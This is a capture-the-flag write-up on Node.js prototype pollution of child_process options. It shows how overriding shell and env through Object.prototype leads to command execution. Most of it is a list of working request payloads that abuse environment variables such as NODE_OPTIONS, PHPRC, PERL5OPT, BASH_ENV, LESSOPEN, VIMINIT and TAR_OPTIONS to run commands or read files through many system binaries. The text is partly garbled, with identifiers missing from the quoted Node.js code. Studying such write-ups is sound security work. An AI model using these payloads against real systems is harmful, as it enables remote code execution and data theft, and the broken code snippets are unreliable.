This article includes solution of
Motivation I found interesting code while do an analysis of the effects of nodejs internal effects.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 if ( ) { const command = [file].concat (args).join (' ' ); if (process.platform === 'win32' ) { if (typeof === 'string' ) file = ; else file = process.env .comspec || 'cmd.exe' ; if (/^(?:.*\\)?cmd(?:\.exe)?$/i .test (file)) { args = ['/d' , '/s' , '/c' , `"${command} "` ]; windowsVerbatimArguments = true ; } else { args = ['-c' , command]; } } else { if (typeof === 'string' ) file = ; else if (process.platform === 'android' ) file = '/system/bin/sh' ; else file = '/bin/sh' ; args = ['-c' , command]; } }
through , in the child_process, one of builtin module of nodejs. By specifying the shell option, I was able to override the default shell used to run the command.
and from We could know the child processes creation uses for ... in
loop for setting child process’s environment variabless it can be seen that the environment variables are also referred to Object.prototype.
1 2 3 4 5 6 7 8 9 const child_process = require ('child_process' );Object .prototype .shell = 'node' ;Object .prototype .env = { NODE_DEBUG : '1; throw require("child_process").execSync("sleep 7").toString()//' , NODE_OPTIONS : '-r /proc/self/environ' }; child_process.execSync ('id' );
By overriding, We can run any binary and make command execution even if the origin command is not vulnerable for this.
However, since nodejs have context-dependency in order of environment variables in /proc/self/environ when creating child processes. I want to know about other general binaries have detected how attacks can be carried out.
After searching a time, I could found an interesting article
Several interpreter languages have been able to carry out attacks in this way. We’ve opened the challenge for more diverse navigation and data collection.
As a result, many people showed interesting solutions. Thank you to @KuroNeko10x @SecurityMB acut3hack @panghoddari @HunterGregal jinmo123 dmbs335 @03sunf NGA @shpik @r0hanSH for participating.
Solution /usr/bin/node 1 2 3 ?file=/usr/bin/node &p[]=NODE_OPTIONS=--require /proc/self/environ &p[]=PHP_EXTRA_CONFIGURE_ARGS=console.log(require('child_process').execSync('cat /flag/f1444g').toString())//
/usr/local/bin/php 1 2 3 ?file=/usr/local/bin/php &p[]=PHP_EXTRA_CONFIGURE_ARGS=1;%0dauto_prepend_file=/proc/self/environ;%0d<?php system("cat /flag/f1444g");?> &p[]=PHPRC=/proc/self/environ
/usr/bin/perl 1 2 3 ?file=/usr/bin/perl &p[]=PERL5OPT=d &p[]=PERL5DB=BEGIN{$f=`ls /flag`; print `cat /flag/$f`}
/bin/bash 1 2 ?file=/bin/bash &p[]=BASH_ENV=`curl`
/usr/bin/bashbug 1 2 ?file=/usr/bin/bashbug &p[]=DEFEDITOR=cat /flag/* >
/usr/bin/less 1 2 3 ?file=/usr/bin/less &p[]=LESSOPEN=curl &p[]=LESS=-?/bin/ls
/usr/bin/vim 1 2 ?file=/usr/bin/vim &p[]=VIMINIT=exe "!/usr/bin/rgrep . /flag" | q!
/usr/bin/byobu-status-detail 1 2 3 4 ?file=/usr/bin/byobu-status-detail &p[]=PATH=/bin &p[]=BYOBU_INCLUDED_LIBS=1 &p[]=BYOBU_PAGER=/bin/cat /flag/*
/usr/bin/byobu 1 2 3 4 5 6 ?file=/usr/bin/byobu &p[]=BYOBU_CONFIG_DIR=/var/www/html/ &p[]=BYOBU_RUN_DIR=/tmp &p[]=BYOBU_INCLUDED_LIBS=1 &p[]=HOME=/var/cache/apache2/mod_cache_disk &p[]=BYOBU_TEST=cd /; ls -al /home > /var/www/html/eyo 2>
/usr/bin/file 1 2 ?file=/usr/bin/file &p[]=MAGIC=/flag/::
/bin/tar 1 2 3 ?file=/bin/tar &p[]=TAPE=/dev/null &p[]=TAR_OPTIONS=-x --use-compress-program="sh -c \"rgrep . /flag >&2\""
/usr/bin/gs 1 2 3 ?file=/usr/bin/gs &p[]=GS_DEVICE=bit &p[]=GS_OPTIONS=@/flag/f1444g
/bin/bzip2 1 2 ?file=/bin/bzip2 &p[]=BZIP=/flag/f1444g
/bin/tar 1 2 3 ?file=/bin/tar &p[]=TAPE=/usr/src/php.tar.xz &p[]=TAR_OPTIONS=-x --to-command="rgrep . /flag"
/usr/bin/rake 1 2 ?file=/usr/bin/rake &p[]=RAKEOPT=-e "print `rgrep . /flag`"
/usr/bin/xz 1 2 ?file=/usr/bin/xz &p[]=XZ_OPT=--files=/flag/f1444g
/usr/bin/zipinfo 1 2 ?file=/usr/bin/zipinfo &p[]=ZIPINFO=-s /flag/*
/usr/bin/zip 1 2 ?file=/usr/bin/zip &p[]=ZIPOPT=/tmp/ -T -TT`cat$IFS$1/flag/f1444g;`
1 2 ?file=/usr/bin/zip &p[]=ZIP=-0 -r - /flag
/usr/bin/unzip 1 2 ?file=/usr/bin/unzip &p[]=UNZIP=-p /tmp/
/bin/grep 1 2 ?file=/bin/grep &p[]=GREP_OPTIONS=-r . /flag
Others The extra solutions were not valid for this challenge.
/usr/bin/systemctl /usr/bin/python 1 PYTHONSTARTUP='/etc/passwd' python
/usr/bin/perl 1 PERL5OPT='-Mbase;print(`id`)' perl /dev/null